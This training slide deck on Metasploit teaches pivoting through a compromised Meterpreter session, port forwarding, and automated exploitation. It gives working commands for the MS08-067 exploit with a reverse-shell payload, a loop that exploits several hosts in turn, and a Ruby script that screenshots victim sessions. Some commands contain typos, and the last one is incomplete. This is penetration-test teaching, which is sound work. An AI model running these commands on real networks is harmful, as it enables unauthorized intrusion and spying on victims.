Metasploit Framework (MSF) Fundamentals Part 3 of 3: Pivoting and Automation Module Type: Basic Method Module Number: 0x04 Last Updated: 2017-03-07 Author: Hermit

Topics Common Terminology Quick Review Pivoting Port Forwarding Automation

Common Terminology Vulnerability Exploit (‘sploit) Types A method of interaction which allows for an unintended action to occur in response to an unexpected, invalid, or otherwise unaccounted for input of some form. Exploit (‘sploit) A piece of code that is designed to exploit a vulnerability to allow for an unintended action. Types There are three key module types in Metasploit: exploit modules, post-exploit modules, and auxiliary modules. Exploit modules take advantage of vulnerabities to gain an initial foothold on the system. Post-exploit modules collect information, escalate privileges, or otherwise expand upon the foothold achieved through an exploit module. Auxiliary modules perform functions unrelated to exploitation.

Common Terminology (continued) Meterpreter A Swiss army knife payload that allows for modular enhancement, routing, secondary exploitation, and control. A solid first-choice. Session An open connection to a remote system through which commands, modules, or network traffic may be directed or routed. Pivoting Using one system to bridge between two networks, typically to move into a more privileged or restricted area.

Quick Review Selecting vulnerabilities Selecting payloads Loading post-exploitation modules

Pivoting Compromise a target system via the exploit of your choice and a Meterpreter payload In the Meterpreter shell, determine what networks are available: meterpreter > ipconfig /all Ethernet adapter Local Area Connection: Physical Address. . . . . . . . . : 00-00-00-01-00-00 IP Address. . . . . . . . . . . . : 192.168.1.35 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Ethernet adapter Local Area Connection 2: Physical Address. . . . . . . . . : 00-00-00-99-99-99 IP Address. . . . . . . . . . . . : 10.10.10.35 Subnet Mask . . . . . . . . . . . : 255.255.255.0

Pivoting (continued) In the Meterpreter shell, run autoroute to establish a route to the new network: meterpreter > run autoroute -s 10.10.10.0/24 [*] Adding a route to 10.10.10.0/255.255.255.0... [+] Added route to 10.10.10.0/255.255.255.0 via 192.168.1.35 [*] Use the -p option to list all active routes Verify the route has been added: meterpreter > run autoroute -p Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 10.10.10.0 255.255.255.0 Session 1 Background the session meterpreter > background

Pivoting (continued) Now just run commands like you normally would, but targeting the new network, and it will automatically route through this connection.

Port Forwarding Let’s say there is a target service on a second level network (one that you can only reach in Metasploit by using routing through a Meterpreter session) that you want to exploit, but the tool to do so isn’t available in Metasploit and you don’t have the time, effort, or expertise to do so. Metasploit provides an easy way to handle this through port forwarding… in essence the remote port gets mapped to a local port accessible by your operating system, and any tool can then use this to directly connect.

Port Forwarding (cont.) To begin, compromise a remote target and establish routing to make Metasploit aware of the path. We’ll assume that our machine is 10.20.30.200 and the remove target is 192.168.33.44 (from a dual- homed system at 10.20.30.123 and 192.168.33.50 which has been compromised with Meterpreter running, not that this makes a lot of difference). run autoroute -s 192.168.33.0/24 Next, use the portfwd command to add the forwarding port (-l is the local port to use, -p is the remote port, and -r is the remote system): portfwd add -l 4480 -p 80 -r 192.168.33.44

Port Forwarding (cont.) Now port 4480 on your local machine is acting as a forward to port 80 on 192.168.33.44. For instance, you could directly connect to that remote system on port 80 using netcat in a regular (non-Metasploit) shell: netcast localhost 4480

Automation All of the work you’ve gone through to this point has prepared you for what comes next… automating these attacks. Let’s assume that you have one exploit that you want to try on every host you get back from a scan (perhaps you’re targeting a corporate environment in a penetration test and they use a common build). You now know how to do this via the MSF Console, but it’s much more efficient to let this stuff run automatically in the background.

Automation For the sake of this demonstration, we’ll assume that you want to use the MS08-067 exploit we’ve used for the examples so far. To review, in the MSF Console you would issue the following commands (responses excluded for brevity): msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 10.20.30.100 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.20.30.200 msf exploit(ms08_067_netapi) > set LPORT 54321 msf exploit(ms08_067_netapi) > exploit

Automation If we run that on multiple hosts, we really only need to update the target host each time… a perfect candidate for automation! We will use the “-x” option to pass a series of commands to the MSF Console on startup (note that the following is all one line, run from a root shell in a terminal session): root@kali:~# msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; set LHOST 10.20.30.200; set LPORT 54321; set RHOST 10.20.30.100; exploit; set RHOST 10.20.30.101; exploit; set RHOST 10.20.30.102; exploit; exit” Each command will be run as if you typed it into the MSF console manually.

Automation Of course, in this case you’d have to manually work each session yourself. What if you wanted to automatically take an action each time and close the session instead? Or what if you just want to collect backgrounded sessions for future efforts? This is where a custom resource file comes into play!

Automation Custom resource files can be simple text files with commands (such as the command line pass we just did), but they can also be Ruby code. We’ll use a variation of the demonstraton code the HD Moore released when Metasploit added Ruby support to demonstrate each of these use cases.

Automation (Ruby Resource) use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 31337 set LHOST 10.20.30.200 set ExitOnSession false <ruby> sleep(1) print_status("Waiting on an incoming sessions...") while (true) framework.sessions.each_pair do |sid,s| thost = s.session_host # Ensure that stdapi has been loaded before running if s.ext.aliases['stdapi'] print_status("Screenshotting session #{sid} #{thost}...") s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85") print_status("Closing session #{sid} #{thost}...") s.kill else print_status("Session #{sid} #{thost} active, but not yet configured") end end print_status("All done") </ruby>

Automation So what does that code do? It loads a generic handler for exploits (something that all Meterpreters can connect to) It prints out the status of incoming connections It ensures that the STDAPI module is loaded It captures a screenshot from the system It closes the session

Automation To load it we just run the MSF Console with the option to process a particular resource file (this file, which we’ll call “autoscreen.rc”): root@kali:~# msfconsole -r ~/autoscreen.rc Now when the MSF Console loads this will automatically begin and process sessions.

Automation … but how do we automate this? First, fire up msfd to get a persistent Metasploit instance (the -q suppresses the banner, and the -p specifies the port): root@kali:~# msfd -q -p 31337 [*] Initializing msfd… [*] Running msfd… Now, remove the lines for the payload from the previous resource file and let’s source that in the msfd session. This window will be our status monitor: root@kali:~# echo “resource /path/to/resource.file” | netcat localhost 31337 [*] Processing /path/to/resource.file for ERB directives [*] resource (/path/to/resource.file)> Ruby Code (576 bytes) [*] Waiting on incoming sessions...

Automation Now in another window we can loop through (in whatever manner we’d like) our targets by piping command sequences into netcat, using the -n and -e switches, e.g.: root@kali:~# echo -n -e “use exploit/windows/smb/ms08_067_netapi\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.20.30.200\nset LPORT 54321\nset RHOST $IPADDRESS\nexploit\nexit” Voila! Quick looping and processing of targets!

Questions?

Additional Resources Metasploit Unleased: https://www.offensive-security.com/metasploit-unleashed/ Sample Metasploit Ruby Resource File: https://github.com/rapid7/metasploit-framework/blob/master/msfd Metasploit: The Penetration Tester’s Guide https://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X Metasploit Social Media https://twitter.com/metasploit (Official account) https://twitter.com/egyp7 (James Lee, lead exploit developer/coder for MSF) https://twitter.com/jduck (Josh Drake, former exploit developer for MSF) Hermit https://twitter.com/hermit_hacker https://www.cryptolingus.net/ https://www.stackattack.net/blog/